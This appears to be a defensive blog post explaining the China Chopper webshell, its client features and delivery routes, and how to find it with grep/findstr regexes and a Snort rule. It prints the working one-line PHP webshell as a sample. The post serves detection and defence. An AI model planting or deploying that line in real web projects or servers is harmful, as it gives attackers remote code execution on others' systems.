What is the China Chopper Webshell, and how to find it on a compromised system?

Some days ago, during a chat with a friend who works in a small software development company, the webshells topic has come up.

During the migration of a production system, my friend found some suspicious .php files, which turned out to be China Chopper webshells.

A simple software upgrade turned into a cybersecurity nightmare.

What is China Chopper?

China Chopper is a 4KB Web shell first discovered in 2012.

It is widely used by Chinese and other malicious actors, including APT groups, to remotely access compromised Web servers.

The webshell consists mainly of two parts, the client interface (caidao.exe) and a small file placed on the compromised web server.

Why this webshell is so dangerous and hard to find?

The file dropped on the compromised server is really small.
For example, the PHP version (the file found by my friend) is composed by a single line of code:

<?php @eval($_POST['password']);?>

Also with a limited acces to the compromized host, is very simple for an attacker to push this small code into a file.

So, all the logic is delegated to the client (caidao.exe) that communicates directly with the file dropped on webserver and provides a lot of interesting feature, like a File explorer, a DataBase client, an interactive command shell and a “Security Scan” useful to perform brute-force password guessing against authentication portals.

An analysis of caidao.exe is available here: https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100

The China Chopper can run on any web server that is capable of running JSP, ASP, ASPX, PHP, or CFM, on both Windows and Linux.

Due to the size of the malware’s payload, delivery mechanism can be very flexible, for example:

  • WebDAV file upload
  • JBoss jmx-console or Apache Tomcat management pages
  • Cross-site scripting (XSS)
  • SQL injection
  • Vulnerabilities in applications/services
  • File processing vulnerabilities
  • Remote file include (RFI) and local file include (LFI) vulnerabilities
  • Lateral propagation from other access
This OS and application flexibility makes this an even more dangerous Web shell.

How can i detect this webshell on my webserver?

The quickest and easiest method is using regular expressions.
On a linux machine, an egrep across your Web directory can help identify infected files (for .PHP version):

egrep -re ' [<][?]php\s\@eval[(]\$_POST\[.+\][)];[?][>]' *.php

On a Windows machine, you can search files using regular expressions by using the native findstr command:

findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php

and for .aspx version:

findstr /R /S "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx

How detect the malicious network traffic?

You can use a Snort IDS signature published by FireEye:

(msg: "China Chopper with first Command Detected";
flow:to_server,established; content: "FromBase64String";
content: "z1"; content:"POST"; nocase;http_method;
classtype:web-application-attack; sid: 900000101;)